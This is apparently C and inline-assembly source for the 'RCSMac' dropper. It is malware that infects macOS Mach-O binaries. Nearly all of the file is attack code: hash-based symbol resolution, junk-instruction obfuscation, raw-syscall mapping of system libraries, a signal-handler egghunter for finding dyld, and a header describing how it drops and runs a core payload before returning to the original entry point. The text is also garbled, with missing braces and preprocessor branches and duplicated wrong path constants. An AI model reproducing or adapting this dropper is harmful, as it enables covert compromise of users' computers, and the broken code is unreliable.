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Test Coverage
* RCSMac Dropper - Dropper Component
*  - API resolution
*    - get dyld_image_count/dyld_get_image_name/dyld_get_image_header from
*      dyld in memory
*      - Look for LC_SYMTAB and get all the symbols from there
*    - cycle through all the loaded images in memory looking for libSystem
*    - once found, get all the other symbols (c standard library)
*      - Same method as dyld -> LC_SYMTAB
*  - Get all the resources info, drop the files and execute the RESOURCE_CORE
*  - Jump to the original entry point
* Created by Alfredo 'revenge' Pesoli on 24/07/2009
* Win32 porting by Massimo Chiodini on 02/11/2009
* Refactored & fixed by Guido Landi on 14/03/2012
* Copyright (C) HT srl 2009. All rights reserved

#include <stdio.h>
#include <sys/stat.h>

#include "RCSMacCommon.h"
#include "RCSMacDropper.h"

#define DYLD32_IMAGE_BASE 0x8FE
#define DYLD64_IMAGE_BASE 0x7fff6 // 0000000

#define O_RDWR          0x0002
#define O_CREAT         0x0200
#define O_TRUNC         0x0400
#define    O_EXCL          0x0800
#define RTLD_DEFAULT    ((void *) - 2)

#define    PROT_READ       0x01    // [MC2] pages can be read
#define    PROT_WRITE      0x02    // [MC2] pages can be written
#define    MAP_SHARED      0x0001  // [MF|SHM] share changes

//#define LOADER_DEBUG

void dropperStart ()
    int a = 5;

void doExit ()
#ifdef WIN32
    __asm__ __volatile__ {
        xor        eax,eax
            push    eax
            inc        eax
            push    eax
            int        0x80
    __asm__ __volatile__ (
        "xorl %eax, %eax\n"
        "push %eax\n"
        "inc %eax\n"
        "push %eax\n"
        "int $0x80\n"

static unsigned int
sdbm (unsigned char *str)
    int c;
    unsigned long hash = 0;

    while ((c = *str++))
        hash = c + (hash << 6) + (hash << 16) - hash;

    return hash;

unsigned int
findSymbolInFatBinary (byte *imageBase, unsigned int symbolHash)
    printf("[ii] findSymbolInFatBinary!\n");

    if (imageBase == 0x0)
        printf("[ee] Exiting (imageBase is 0)\n");

    struct mach_header *mh_header       = NULL;
    struct load_command *l_command      = NULL; 
    struct nlist *sym_nlist             = NULL; 
    struct symtab_command *sym_command  = NULL;
    struct segment_command *seg_command = NULL;
    struct fat_header *f_header         = NULL;
    struct fat_arch *f_arch             = NULL;
    char *symbolName = NULL;
    int offset, symbolOffset, stringOffset, x86Offset, found;
    unsigned int i, nfat;

    __asm {
        push eax
            pop eax
            mov eax, eax
            add eax, 0
            mov ebx, ebx
            push ecx
            mov ecx, ecx
            pop ecx

    offset = found = 0;
    f_header = (struct fat_header *)imageBase;

    __asm {
        push eax
            pop eax
            mov eax, eax
            add eax, 0
            mov ebx, ebx
            push ecx
            mov ecx, ecx
            pop ecx

    offset += sizeof (struct fat_header);
    nfat = SWAP_LONG (f_header->nfat_arch);

    printf("[ii] magic: %x\n", f_header->magic);
    printf("[ii] nFatArch: %d\n", nfat);

    __asm {
        push eax
            pop eax
            mov eax, eax
            add eax, 0
            mov ebx, ebx
            push ecx
            mov ecx, ecx
            pop ecx

    for (i = 0; i < nfat; i++)
        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx
        f_arch = (struct fat_arch *)(imageBase + offset);
        int cpuType = SWAP_LONG (f_arch->cputype);
        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx
        if (cpuType == 0x7)
        __asm { 
            mov eax, eax 
                push ecx 
                pop ecx 
                mov ecx, ecx 
        offset += sizeof (struct fat_arch);

    x86Offset = SWAP_LONG (f_arch->offset);
    printf ("[ii] x86 offset: %x\n", x86Offset);
    __asm {
        push eax
            pop eax
            mov eax, eax
            add eax, 0
            mov ebx, ebx
            push ecx
            mov ecx, ecx
            pop ecx
    offset = x86Offset;
    mh_header = (struct mach_header *)(imageBase + offset); 
    __asm {
        push eax
            pop eax
            mov eax, eax
            add eax, 0
            mov ebx, ebx
            push ecx
            mov ecx, ecx
            pop ecx
    offset += sizeof (struct mach_header);

    printf("imageBase in findSymbolFat: %x\n", mh_header);

    printf("[ii] ncmdsFat: %d\n", mh_header->ncmds);

    for (i = 0; i < mh_header->ncmds; i++)
        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx
        l_command = (struct load_command *)(imageBase + offset);

        printf("[ii] cmdFat: %d\n", l_command->cmd);

        if (l_command->cmd == LC_SEGMENT)
            __asm {
                push eax
                    pop eax
                    mov eax, eax
                    add eax, 0
                    mov ebx, ebx
                    push ecx
                    mov ecx, ecx
                    pop ecx
            if (found)
                __asm {
                    push eax
                        pop eax
                        mov eax, eax
                        add eax, 0
                        mov ebx, ebx
                        push ecx
                        mov ecx, ecx
                        pop ecx
                offset += l_command->cmdsize;
                __asm {
                    push eax
                        pop eax
                        mov eax, eax
                        add eax, 0
                        mov ebx, ebx
                        push ecx
                        mov ecx, ecx
                        pop ecx
            __asm {
                push eax
                    pop eax
                    mov eax, eax
                    add eax, 0
                    mov ebx, ebx
                    push ecx
                    mov ecx, ecx
                    pop ecx
            seg_command = (struct segment_command *)(imageBase + offset);

            printf("[ii] segNameFat: %s\n", seg_command->segname);

            if (sdbm ((unsigned char *)seg_command->segname) == linkeditHash)
                found = 1;
            __asm { 
                mov eax, eax 
                    push ecx 
                    pop ecx 
                    mov ecx, ecx 
        else if (l_command->cmd == LC_SYMTAB)
            __asm {
                push eax
                    pop eax
                    mov eax, eax
                    add eax, 0
                    mov ebx, ebx
                    push ecx
                    mov ecx, ecx
                    pop ecx
            sym_command = (struct symtab_command *)(imageBase + offset);

            if (found)
            __asm {
                push eax
                    pop eax
                    mov eax, eax
                    add eax, 0
                    mov ebx, ebx
                    push ecx
                    mov ecx, ecx
                    pop ecx
        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx
        offset += l_command->cmdsize;

    __asm {
        push eax
            pop eax
            mov eax, eax
            add eax, 0
            mov ebx, ebx
            push ecx
            mov ecx, ecx
            pop ecx
    symbolOffset = x86Offset + sym_command->symoff;
    stringOffset = x86Offset + sym_command->stroff;

    printf("[ii] offsetFat: %x\n", offset);
    printf("[ii] stringOffsetFat: %x\n", stringOffset);
    printf("[ii] nSymsFat: %d\n", sym_command->nsyms);

    for (i = 0; i < sym_command->nsyms; i++)
        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx
        sym_nlist = (struct nlist *)(imageBase + symbolOffset);
        symbolOffset += sizeof (struct nlist);
        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx
        if (sym_nlist->n_un.n_strx == 0x0)
            __asm {
                push eax
                    pop eax
                    mov eax, eax
                    add eax, 0
                    mov ebx, ebx
                    push ecx
                    mov ecx, ecx
                    pop ecx

        __asm { 
            mov eax, eax 
                push ecx 
                pop ecx 
                mov ecx, ecx 
        symbolName  = (char *)(imageBase + sym_nlist->n_un.n_strx + stringOffset);

        __asm {
            push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx

        printf ("[ii] SYMBOLFat: %s\n", symbolName);

        if (sdbm((unsigned char *)symbolName) == symbolHash)
            printf ("[ii] Symbol Found\n");
            printf ("[ii] SYMBOLFat: %s\n", symbolName);
            printf ("[ii] addressFat: %x\n", sym_nlist->n_value);
            __asm {
                push eax
                    pop eax
                    mov eax, eax
                    add eax, 0
                    mov ebx, ebx
                    push ecx
                    mov ecx, ecx
                    pop ecx
            return sym_nlist->n_value;

    return -1;

unsigned int
findSymbol_snow (byte *imageBase, unsigned int symbolHash)
    struct mach_header *mh_header       = NULL;
    struct load_command *l_command      = NULL; 
    struct nlist *sym_nlist             = NULL; 
    struct symtab_command *sym_command  = NULL;
    struct segment_command *seg_command = NULL;

    char *symbolName = NULL;

    int offset, found, stringOffset; 

    unsigned int hash, i;

    offset = found = 0; 
    mh_header = (struct mach_header *)imageBase; 
    offset += sizeof (struct mach_header);

    for (i = 0; i < mh_header->ncmds; i++)
        l_command = (struct load_command *)(imageBase + offset); 

        if (l_command->cmd == LC_SEGMENT)
            if (found)
                offset += l_command->cmdsize;

            seg_command = (struct segment_command *)(imageBase + offset);

            if (sdbm ((unsigned char *)seg_command->segname) == linkeditHash)
                found = 1;
        else if (l_command->cmd == LC_SYMTAB)
            sym_command = (struct symtab_command *)(imageBase + offset); 

            if (found)

        offset += l_command->cmdsize;

    offset = sym_command->symoff - seg_command->fileoff + seg_command->vmaddr;
    stringOffset = sym_command->stroff - seg_command->fileoff + seg_command->vmaddr; 

    for (i = 0; i < sym_command->nsyms; i++)
        sym_nlist = (struct nlist *)offset;
        offset += sizeof (struct nlist);

        symbolName = (char *)(sym_nlist->n_un.n_strx + stringOffset);
        hash = sdbm ((unsigned char *)symbolName);

        printf ("[ii] SYMBOL: %s\n", symbolName);
        if (hash == symbolHash)
            printf ("[ii] Symbol Found\n");
            printf ("[ii] SYMBOL: %s\n", symbolName);
            printf ("[ii] address: %x\n", sym_nlist->n_value);
            return sym_nlist->n_value;
    return -1;
unsigned int
findSymbol_mavericks(byte *imageBase, unsigned int symbolHash)
    unsigned int i, offset, found, textVMAddr;
    struct mach_header *mh_header = NULL;
    struct load_command *l_command = NULL;
    struct segment_command *seg_command = NULL;
    struct symtab_command *sym_command = NULL;
    struct nlist *sym_nlist = NULL;

    mh_header = (struct mach_header *)imageBase;
    offset = sizeof(struct mach_header);

    for (i=0, found=0; i<mh_header->ncmds; i++)
        l_command = (struct load_command *) (imageBase + offset);
        if (l_command->cmd == LC_SEGMENT)
            if (!found)
                seg_command = (struct segment_command *)(imageBase + offset);
                if (sdbm((unsigned char *)seg_command->segname) == linkeditHash)
                    found = 1;

                if (sdbm((unsigned char *)seg_command->segname) == 0xd5be1a2d)
                    textVMAddr = seg_command->vmaddr;

        else if (l_command->cmd == LC_SYMTAB)
            if (found)
                sym_command = (struct symtab_command *) (imageBase + offset);

        offset += l_command->cmdsize;

    if (found == 0 || sym_command == NULL || seg_command == NULL)
        return -1;

    unsigned int linkeditVmaddr = (seg_command->vmaddr - textVMAddr) + (unsigned int)imageBase;
    unsigned int stringOffset = sym_command->stroff - seg_command->fileoff + linkeditVmaddr;
    offset = sym_command->symoff - seg_command->fileoff + linkeditVmaddr;

    for (i=0; i<sym_command->nsyms; i++)
        sym_nlist = (struct nlist *)offset;
        offset += sizeof (struct nlist);

        unsigned char *symbolName = (unsigned char *)(sym_nlist->n_un.n_strx + stringOffset);
        if (sdbm(symbolName) == symbolHash)
            unsigned int sym_offset = sym_nlist->n_value;
            return (sym_offset - (0x8FE<<20) + (unsigned int)imageBase);

    return -1;

unsigned int
findSymbol_lion(byte *imageBase, unsigned int symbolHash)
    struct mach_header *mh_header       = NULL;
    struct load_command *l_command      = NULL; 
    struct nlist *sym_nlist             = NULL; 
    struct symtab_command *sym_command  = NULL;
    struct segment_command *seg_command = NULL;

    char *symbolName = NULL;

    int offset, found, stringOffset;

    unsigned int hash, i;

    offset = found = 0; 
    mh_header = (struct mach_header *)imageBase;
    offset += sizeof (struct mach_header);

    for (i = 0; i < mh_header->ncmds; i++)
        l_command = (struct load_command *)(imageBase + offset); 

        if (l_command->cmd == LC_SEGMENT)
            if (found)
                offset += l_command->cmdsize;

            seg_command = (struct segment_command *)(imageBase + offset);

            if (sdbm ((unsigned char *)seg_command->segname) == linkeditHash)
                found = 1;
        else if (l_command->cmd == LC_SYMTAB)
            sym_command = (struct symtab_command *)(imageBase + offset); 

            if (found)

        offset += l_command->cmdsize;

    unsigned int linkeditVmaddr;
    unsigned int dyldBase;

    // Fow now we hardcode the vmaddr for the linkedit segment in dyld
    // the right thing to do would be parsing the binary on disk
    // Parse __TEXT and get vmaddr
    // Parse __LINKEDIT and get vmaddr
    // __LINKEDIT->vmaddr - __TEXT->vmaddr = memory displacement
    // then randomized base + memory displacement = randomized __LINKEDIT position
    //if (sizeof(long) == 8) // 64bit
    //linkeditVmaddr = (unsigned int)imageBase + 0x71000;
    //dyldBase = DYLD64_IMAGE_BASE << 40;
    if (sizeof(long) == 4) // 32bit
        linkeditVmaddr = (unsigned int)imageBase + 0x5e000;
        dyldBase = DYLD32_IMAGE_BASE << 20;

    offset = sym_command->symoff - seg_command->fileoff + linkeditVmaddr;
    stringOffset = sym_command->stroff - seg_command->fileoff + linkeditVmaddr;

    for (i = 0; i < sym_command->nsyms; i++)
        sym_nlist = (struct nlist *)offset;
        offset += sizeof (struct nlist);

        symbolName = (char *)(sym_nlist->n_un.n_strx + stringOffset);
        hash = sdbm ((unsigned char *)symbolName);

#ifdef DEBUG
        printf ("[ii] SYMBOL: %s\n", symbolName);
        if (hash == symbolHash)
#ifdef DEBUG
            printf ("[ii] Symbol Found\n");
            printf ("[ii] SYMBOL: %s\n", symbolName);
            printf ("[ii] address: %x\n", sym_nlist->n_value);

            unsigned int sym_offset = sym_nlist->n_value - dyldBase;
            sym_offset += (unsigned int)imageBase;

            return sym_offset;

    return -1;

void *mapLibSystem() 
    // since struct stat on win32 is half the size of the unix counterpart
    // declare it twice for padding the damn ebp :>
    struct stat pad;
    struct stat mSt;

    void *address;
    int fd;
    int err;

    //fd = open("/usr/lib/libSystem.B.dylib", O_RDONLY);
#ifdef WIN32
    __asm__ __volatile__ {
        sub esp, 0x80
            push 0x00006269
            push 0x6c79642e
            push 0x422e6d65
            push 0x74737953
            push 0x62696c2f
            push 0x62696c2f
            push 0x7273752f
            mov edx, esp
            push 0x0
            push edx
            xor eax, eax
            mov al, 0x5
            push eax
            int 0x80
            mov [fd], eax
    __asm__ __volatile__ (
        "subl    $52, %%esp\n"
        "pushl $0x00006269\n"
        "pushl $0x6c79642e\n"
        "pushl $0x422e6d65\n"
        "pushl $0x74737953\n"
        "pushl $0x62696c2f\n"
        "pushl $0x62696c2f\n"
        "pushl $0x7273752f\n"
        "movl    %%esp, %%edx\n"
        "pushl $0x0\n"
        "pushl %%edx\n"
        "xorl %%eax, %%eax\n"
        "movb $5, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"

    if (fd == -1)
        return (NULL);

    //err = fstat(fd, &st);
#ifdef WIN32
    __asm__ __volatile__ {
        lea eax, [pad]
        mov DWORD PTR [esp+0x4], eax // struct stat
            mov eax, [fd]
        mov DWORD PTR [esp], eax     // fd
            xor eax, eax
            mov al, 189
            push eax
            int 0x80
            mov [err], eax
    __asm__ __volatile__ (
        "leal %2, %%eax\n"
        "movl %%eax, 4(%%esp)\n"
        "movl %1, %%eax\n"
        "movl %%eax, (%%esp)\n" 
        "xorl %%eax, %%eax\n"
        "movb $189, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"
        :"m"(fd), "m"(st)

    if (err != 0)
        return (NULL);

    //ret = mmap(0, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
#ifdef WIN32
    __asm__ __volatile__ {
        mov DWORD PTR [esp+24], 0
            mov DWORD PTR [esp+20], 0
            mov eax, [fd]
        mov DWORD PTR [esp+16], eax
            mov DWORD PTR [esp+12], 2       // MAP_PRIVATE
            mov DWORD PTR [esp+8], 1        // PROT_READ
            mov eax, [ebp-0x30]             // st.st_size (win ~46 bytes, osx ~96 bytes)
        mov DWORD PTR [esp+4], eax
            mov DWORD PTR [esp], 0
            xor eax, eax
            mov al, 197
            push eax
            int 0x80
            mov [address], eax
    __asm__ __volatile__ (
        "movl    $0, 24(%%esp)\n"
        "movl    $0, 20(%%esp)\n"
        "movl    %2, %%eax\n"
        "movl    %%eax, 16(%%esp)\n"
        "movl    $2, 12(%%esp)\n"
        "movl    $1, 8(%%esp)\n"
        "movl    %1, %%eax\n"
        "movl    %%eax, 4(%%esp)\n"
        "movl    $0, (%%esp)\n"
        "xorl    %%eax, %%eax\n"
        "movb    $197, %%al\n"
        "pushl    %%eax\n"
        "int    $0x80\n"
        "mov    %%eax, %0\n"
        :"m"(st.st_size), "m"(fd)

    return address;

void *mapLibDyld() 
    // since struct stat on win32 is half the size of the unix counterpart
    // declare it twice for padding the damn ebp :>
    struct stat pad;
    struct stat mSt;

    void *address;
    int fd;
    int err;

    //fd = open("/usr/lib/system/libdyld.dylib", O_RDONLY);
#ifdef WIN32
    __asm__ __volatile__ {
        sub esp, 0x84
            push 0x00000062
            push 0x696c7964
            push 0x2e646c79
            push 0x6462696c
            push 0x2f6d6574
            push 0x7379732f
            push 0x62696c2f
            push 0x7273752f
            mov edx, esp
            push 0x0
            push edx
            xor eax, eax
            mov al, 0x5
            push eax
            int 0x80
            mov [fd], eax
    __asm__ __volatile__ (
        "subl    $52, %%esp\n"
        "pushl $0x00006269\n"
        "pushl $0x6c79642e\n"
        "pushl $0x422e6d65\n"
        "pushl $0x74737953\n"
        "pushl $0x62696c2f\n"
        "pushl $0x62696c2f\n"
        "pushl $0x7273752f\n"
        "movl    %%esp, %%edx\n"
        "pushl $0x0\n"
        "pushl %%edx\n"
        "xorl %%eax, %%eax\n"
        "movb $5, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"

    if (fd == -1)
        return (NULL);

    //err = fstat(fd, &st);
#ifdef WIN32
    __asm__ __volatile__ {
        lea eax, [pad]
        mov DWORD PTR [esp+0x4], eax // struct stat
            mov eax, [fd]
        mov DWORD PTR [esp], eax     // fd
            xor eax, eax
            mov al, 189
            push eax
            int 0x80
            mov [err], eax
    __asm__ __volatile__ (
        "leal %2, %%eax\n"
        "movl %%eax, 4(%%esp)\n"
        "movl %1, %%eax\n"
        "movl %%eax, (%%esp)\n" 
        "xorl %%eax, %%eax\n"
        "movb $189, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"
        :"m"(fd), "m"(st)

    if (err != 0)
        return (NULL);

    //ret = mmap(0, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
#ifdef WIN32
    __asm__ __volatile__ {
        mov DWORD PTR [esp+24], 0
            mov DWORD PTR [esp+20], 0
            mov eax, [fd]
        mov DWORD PTR [esp+16], eax
            mov DWORD PTR [esp+12], 2       // MAP_PRIVATE
            mov DWORD PTR [esp+8], 1        // PROT_READ
            mov eax, [ebp-0x30]             // st.st_size (win ~46 bytes, osx ~96 bytes)
        mov DWORD PTR [esp+4], eax
            mov DWORD PTR [esp], 0
            xor eax, eax
            mov al, 197
            push eax
            int 0x80
            mov [address], eax
    __asm__ __volatile__ (
        "movl    $0, 24(%%esp)\n"
        "movl    $0, 20(%%esp)\n"
        "movl    %2, %%eax\n"
        "movl    %%eax, 16(%%esp)\n"
        "movl    $2, 12(%%esp)\n"
        "movl    $1, 8(%%esp)\n"
        "movl    %1, %%eax\n"
        "movl    %%eax, 4(%%esp)\n"
        "movl    $0, (%%esp)\n"
        "xorl    %%eax, %%eax\n"
        "movb    $197, %%al\n"
        "pushl    %%eax\n"
        "int    $0x80\n"
        "mov    %%eax, %0\n"
        :"m"(st.st_size), "m"(fd)

    return address;

void *mapLibSystemC() 
    // since struct stat on win32 is half the size of the unix counterpart
    // declare it twice for padding the damn ebp :>
    struct stat pad;
    struct stat mSt;

    void *address;
    int fd;
    int err;

    //fd = open("/usr/lib/system/libsystem_c.dylib", O_RDONLY);
#ifdef WIN32
    __asm__ __volatile__ {
        sub esp, 0x88
            push 0x00000062
            push 0x696c7964
            push 0x2e635f6d
            push 0x65747379
            push 0x7362696c
            push 0x2f6d6574
            push 0x7379732f
            push 0x62696c2f
            push 0x7273752f
            mov edx, esp
            push 0x0
            push edx
            xor eax, eax
            mov al, 0x5
            push eax
            int 0x80
            mov [fd], eax
    __asm__ __volatile__ (
        "subl    $52, %%esp\n"
        "pushl $0x00006269\n"
        "pushl $0x6c79642e\n"
        "pushl $0x422e6d65\n"
        "pushl $0x74737953\n"
        "pushl $0x62696c2f\n"
        "pushl $0x62696c2f\n"
        "pushl $0x7273752f\n"
        "movl    %%esp, %%edx\n"
        "pushl $0x0\n"
        "pushl %%edx\n"
        "xorl %%eax, %%eax\n"
        "movb $5, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"

    if (fd == -1)
        return (NULL);

    //err = fstat(fd, &st);
#ifdef WIN32
    __asm__ __volatile__ {
        lea eax, [pad]
        mov DWORD PTR [esp+0x4], eax // struct stat
            mov eax, [fd]
        mov DWORD PTR [esp], eax     // fd
            xor eax, eax
            mov al, 189
            push eax
            int 0x80
            mov [err], eax
    __asm__ __volatile__ (
        "leal %2, %%eax\n"
        "movl %%eax, 4(%%esp)\n"
        "movl %1, %%eax\n"
        "movl %%eax, (%%esp)\n" 
        "xorl %%eax, %%eax\n"
        "movb $189, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"
        :"m"(fd), "m"(st)

    if (err != 0)
        return (NULL);

    //ret = mmap(0, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
#ifdef WIN32
    __asm__ __volatile__ {
        mov DWORD PTR [esp+24], 0
            mov DWORD PTR [esp+20], 0
            mov eax, [fd]
        mov DWORD PTR [esp+16], eax
            mov DWORD PTR [esp+12], 2       // MAP_PRIVATE
            mov DWORD PTR [esp+8], 1        // PROT_READ
            mov eax, [ebp-0x30]             // st.st_size (win ~46 bytes, osx ~96 bytes)
        mov DWORD PTR [esp+4], eax
            mov DWORD PTR [esp], 0
            xor eax, eax
            mov al, 197
            push eax
            int 0x80
            mov [address], eax
    __asm__ __volatile__ (
        "movl    $0, 24(%%esp)\n"
        "movl    $0, 20(%%esp)\n"
        "movl    %2, %%eax\n"
        "movl    %%eax, 16(%%esp)\n"
        "movl    $2, 12(%%esp)\n"
        "movl    $1, 8(%%esp)\n"
        "movl    %1, %%eax\n"
        "movl    %%eax, 4(%%esp)\n"
        "movl    $0, (%%esp)\n"
        "xorl    %%eax, %%eax\n"
        "movb    $197, %%al\n"
        "pushl    %%eax\n"
        "int    $0x80\n"
        "mov    %%eax, %0\n"
        :"m"(st.st_size), "m"(fd)

    return address;

void *mapLibSystemK() 
    // since struct stat on win32 is half the size of the unix counterpart
    // declare it twice for padding the damn ebp :>
    struct stat pad;
    struct stat mSt;

    void *address;
    int fd;
    int err;

    //fd = open("/usr/lib/system/libsystem_kernel.dylib", O_RDONLY);
#ifdef WIN32
    __asm__ __volatile__ {
        sub esp, 0x92
            push 0x00006269
            push 0x6c79642e
            push 0x6c656e72
            push 0x656b5f6d
            push 0x65747379
            push 0x7362696c
            push 0x2f6d6574
            push 0x7379732f
            push 0x62696c2f
            push 0x7273752f
            mov edx, esp
            push 0x0
            push edx
            xor eax, eax
            mov al, 0x5
            push eax
            int 0x80
            mov [fd], eax
    __asm__ __volatile__ (
        "subl    $52, %%esp\n"
        "pushl $0x00006269\n"
        "pushl $0x6c79642e\n"
        "pushl $0x422e6d65\n"
        "pushl $0x74737953\n"
        "pushl $0x62696c2f\n"
        "pushl $0x62696c2f\n"
        "pushl $0x7273752f\n"
        "movl    %%esp, %%edx\n"
        "pushl $0x0\n"
        "pushl %%edx\n"
        "xorl %%eax, %%eax\n"
        "movb $5, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"

    if (fd == -1)
        return (NULL);

    //err = fstat(fd, &st);
#ifdef WIN32
    __asm__ __volatile__ {
        lea eax, [pad]
        mov DWORD PTR [esp+0x4], eax // struct stat
            mov eax, [fd]
        mov DWORD PTR [esp], eax     // fd
            xor eax, eax
            mov al, 189
            push eax
            int 0x80
            mov [err], eax
    __asm__ __volatile__ (
        "leal %2, %%eax\n"
        "movl %%eax, 4(%%esp)\n"
        "movl %1, %%eax\n"
        "movl %%eax, (%%esp)\n" 
        "xorl %%eax, %%eax\n"
        "movb $189, %%al\n"
        "pushl %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0"
        :"m"(fd), "m"(st)

    if (err != 0)
        return (NULL);

    //ret = mmap(0, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
#ifdef WIN32
    __asm__ __volatile__ {
        mov DWORD PTR [esp+24], 0
            mov DWORD PTR [esp+20], 0
            mov eax, [fd]
        mov DWORD PTR [esp+16], eax
            mov DWORD PTR [esp+12], 2       // MAP_PRIVATE
            mov DWORD PTR [esp+8], 1        // PROT_READ
            mov eax, [ebp-0x30]             // st.st_size (win ~46 bytes, osx ~96 bytes)
        mov DWORD PTR [esp+4], eax
            mov DWORD PTR [esp], 0
            xor eax, eax
            mov al, 197
            push eax
            int 0x80
            mov [address], eax
    __asm__ __volatile__ (
        "movl    $0, 24(%%esp)\n"
        "movl    $0, 20(%%esp)\n"
        "movl    %2, %%eax\n"
        "movl    %%eax, 16(%%esp)\n"
        "movl    $2, 12(%%esp)\n"
        "movl    $1, 8(%%esp)\n"
        "movl    %1, %%eax\n"
        "movl    %%eax, 4(%%esp)\n"
        "movl    $0, (%%esp)\n"
        "xorl    %%eax, %%eax\n"
        "movb    $197, %%al\n"
        "pushl    %%eax\n"
        "int    $0x80\n"
        "mov    %%eax, %0\n"
        :"m"(st.st_size), "m"(fd)

    return address;


void labelTest ()

void secondStageDropper (unsigned long args)
    unsigned int fd;
    hijack_context *h_context = (hijack_context *)&args; // "context" saved by pushad

    // save registers to restore it later
    unsigned long _eax = h_context->eax;
    unsigned long _ecx = h_context->ecx;
    unsigned long _edx = h_context->edx;
    unsigned long _ebx = h_context->ebx;
    unsigned long _esp = h_context->esp;
    unsigned long _ebp = h_context->ebp;
    unsigned long _esi = h_context->esi;
    unsigned long _edi = h_context->edi;

    int crtStartSize = 54;
    const char *imageName   = NULL;
    void *baseAddress       = NULL;
    void *libSystemAddress  = NULL;
    void *dyldBaseAddress   = NULL;
    int imageCount, z       = 0;
    void *infectionBase     = NULL;

#ifdef WIN32
    sigaction new_act = {0};
    sigaction old_act = {0};
    u32_sigaction sig = {0};
    unsigned int sig_handler;    
    unsigned char file_buffer[1024];
    int osx_version, file_handle, read_len, i;

    sig_handler = osx_version = file_handle = read_len = i = 0;

    __asm__ __volatile__ {
        mov eax, [ebp+0x4]            // retaddr
        sub eax, 0xD3                // infection base is 0xd3 bytes before retaddr

        mov [infectionBase], eax    

        jmp get_pc
        pop eax
        mov [sig_handler], eax

        jmp l_out
        call init

        // this is weird, depending on some stars allignment the context's
        // offset changes and so we just scan the stack for a register we 
        // know it's not changed by the kernel(ebp)
        mov eax, esp
        add eax, 0x4 // eax == eip subito dopo get_pc
        cmp [eax], ebp
        jne sig_loop

        add eax, 0x4
        mov esp, eax
        // now esp points to the faulting ESP value
        // in the middle of the thread context

        sub [esp], 4        // make room for retaddr
        mov eax, [esp]        

        mov ebx, [esp+0xc]    // ebx == faulting EIP
        add ebx, 8            // add to EIP to jump over CMP & JE of egghunter !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
        mov [eax], ebx        // save retaddr

            // restore registers & return back to the egghunter
        mov eax, [esp-0x1c]
        mov ebx, [esp-0x18]
        mov ecx, [esp-0x14]
        mov edx, [esp-0x10]
        mov esi, [esp-0xc]
        mov edi, [esp-0x8]
        mov ebp, [esp-0x4]
        mov esp, [esp]



    sig.sig_action = 0x41414141;
    sig.sig_tramp    = sig_handler;
    sig.sig_flags    = 0x70;    // SA_SIGINFO|SA_NODEFER|SA_NOCLDWAIT

    // install sig_handler
    __asm__ __volatile__ {
        lea eax, [sig]

        mov eax, eax 
            push ecx 
            pop ecx 
            mov ecx, ecx 

            push 0x0
            push eax        // &sig
            push 0xb        // SIGSEGV

            mov eax, eax 
            push ecx 
            pop ecx 
            mov ecx, ecx 

            mov eax, 0x2e    // SYS_sigaction
            push eax
            int 0x80
            add esp, 0x10
    // egghunter: scans for the first 0xfeedface from 
    // 0x8fe00000 to 0x8fff0000
    __asm__ __volatile__ {
        mov eax, 0x8fe00000
        cmp DWORD PTR [eax], 0xfeedface // se qui c'e' un exception va a eseguire il sig_handler qui sopra che restora i registri e ritorna due istruzioni dipo.
        je found
        add eax, 0x1000 // qui ritorna il sig_handler!
        cmp eax, 0x8fff1000
        jne l_loop
        mov DWORD PTR [dyldBaseAddress], 0x0
        jmp l_break
        mov DWORD PTR [dyldBaseAddress], eax

    char SystemVersion[49] = {'/', 'S', 'y', 's', 't', 'e', 'm', '/', 'L', 'i', 'b', 'r', 'a', 'r', 'y', '/', 'C', 'o', 'r', 'e', 'S', 'e', 'r', 'v', 'i', 'c', 'e', 's', '/', 'S', 'y', 's', 't', 'e', 'm', 'V', 'e', 'r', 's', 'i', 'o', 'n', '.', 'p', 'l', 'i', 's', 't', 0x0};
    // find macosx version, si puo' fare con una syscall :)
    __asm__ __volatile__ {
        push 0
        ///push [SystemVersion]
        lea eax, [SystemVersion]
        push eax
        mov eax, 0x5
        push eax
        int 0x80
        mov [file_handle], eax
        //add esp, 0x40
        add esp, 0xc

    if(file_handle <= 0)
        goto OEP_CALL;
    // read file
    __asm__ __volatile__ {
        push 0x400
        lea eax, [file_buffer]
        push eax
        mov eax, [file_handle]
        push eax
        mov eax, 0x3

        push eax
        int 0x80
        mov [read_len], eax

        add esp, 0x10

    if(read_len <= 0)
        goto OEP_CALL;

    // homebrew plist parsing FTW!
    while(*(unsigned int *)&file_buffer[i++] != 0x696c702f && read_len > i) // "/pli"
        if(*(unsigned int *)&file_buffer[i] == 0x2e30313e) // ">10."
            if (file_buffer[i+4] == 0x36)
                osx_version = 1;
            else if(file_buffer[i+4] == 0x37 || file_buffer[i+4] == 0x38)
                osx_version = 2;
            else if (file_buffer[i+4] == 0x39)
                osx_version = 3;


    __asm__ __volatile__ (
        "movl 4(%%ebp), %%eax\n"
